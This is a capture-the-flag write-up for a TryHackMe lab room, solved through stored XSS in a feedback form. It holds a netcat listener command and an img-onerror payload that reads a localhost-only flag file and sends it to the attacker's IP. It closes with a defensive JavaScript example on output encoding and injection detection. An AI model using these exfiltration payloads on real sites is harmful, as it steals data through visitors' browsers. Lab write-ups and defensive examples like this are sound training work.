https://tryhackme.com/room/thestickershop
Keyword: Stored XSS
Question Hint: Can you conduct any client-side exploitation in order to read the flag?
Thank you very much, https://splitunknown.medium.com/the-sticker-shop-thm-walk-through-805b25ca6a59!
Based on the question hint, we can identify potential client-side vulnerabilities like XSS or CSRF.
Upon examining the website, we find a Feedback page that accepts user input; this points clearly to stored XSS as our likely vector.
Thanks to https://splitunknown.medium.com/the-sticker-shop-thm-walk-through-805b25ca6a59, we'll test for XSS with a payload that makes the victim's browser fetch a URL on a server we control. First, let's get our attacker's IP address:
$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.4.126.108 netmask 255.255.128.0 destination 10.4.126.108
Next, start the server:
nc -knvlp 9090
Now craft the payload:
<img src="x" onerror="fetch('10.4.126.108:9090')">
Navigate to http://10.10.130.23:8080/flag.txt to see the response:

We notice something interesting: why is the response origin localhost?
This suggests flag.txt is only served to requests coming from the server itself. Our solution: have the victim's browser fetch http://localhost:8080/flag.txt and append the response as a query parameter on a GET request to our server.
Here's our updated payload:
<img src="x" onerror="fetch('http://127.0.0.1:8080/flag.txt').then(r => r.text()).then(r => fetch('http://10.4.126.108:9090?flag='+r))">
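As an added defensive counterpart to the walkthrough above (example code written for this page, not part of the room or the referenced blog post), here is what the Feedback page should have done with stored input: HTML-encode every entry on output so that the `<img ... onerror=...>` payload renders as inert text. The code assumes feedback is stored as raw strings and later concatenated into a page; the vulnerable and hardened renderers, the triage heuristic and the sample entries are all constructed for illustration, and ATTACKER_HOST is a placeholder.

```javascript
// Added defensive example; not code from the room or the walkthrough author.
// Assumption: feedback entries are stored as raw strings and later rendered into HTML.

// Encode the five characters that let user text break out of an HTML text node or attribute.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: raw feedback is concatenated straight into markup.
// This is the shape of bug that lets a stored payload fire in every viewer's browser.
function renderFeedbackUnsafe(entries) {
  return '<ul>' + entries.map(e => `<li>${e}</li>`).join('') + '</ul>';
}

// Hardened rendering: every entry is encoded before it reaches the page,
// so the browser shows the payload as text instead of creating an <img> element.
function renderFeedbackSafe(entries) {
  return '<ul>' + entries.map(e => `<li>${escapeHtml(e)}</li>`).join('') + '</ul>';
}

// Coarse triage heuristic for a moderation queue or log review: flags stored text that
// contains a tag with an inline event handler or a <script> tag. Heuristic only;
// output encoding above is the actual fix, and a CSP limits what an injected
// handler could still do (for example connect-src restricting where fetch() may go).
function looksLikeMarkupInjection(text) {
  return /<\s*[a-z][^>]*\bon[a-z]+\s*=/i.test(text) || /<\s*script\b/i.test(text);
}

// Constructed sample feedback: one benign review and the payload shape from the walkthrough
// with the listener host replaced by a placeholder.
const SAMPLE_FEEDBACK = [
  'Great stickers, fast shipping!',
  '<img src="x" onerror="fetch(\'http://ATTACKER_HOST:9090\')">',
];

// Stand-alone demonstration: print both renderings and the triage result per entry.
function demo() {
  console.log('UNSAFE:', renderFeedbackUnsafe(SAMPLE_FEEDBACK));
  console.log('SAFE:  ', renderFeedbackSafe(SAMPLE_FEEDBACK));
  for (const e of SAMPLE_FEEDBACK) {
    console.log(looksLikeMarkupInjection(e) ? 'FLAGGED' : 'ok     ', JSON.stringify(e));
  }
}
demo();
```

The encoded output still displays the reviewer's text exactly as typed, which is the point: the feedback page never needed to interpret markup, only to show it.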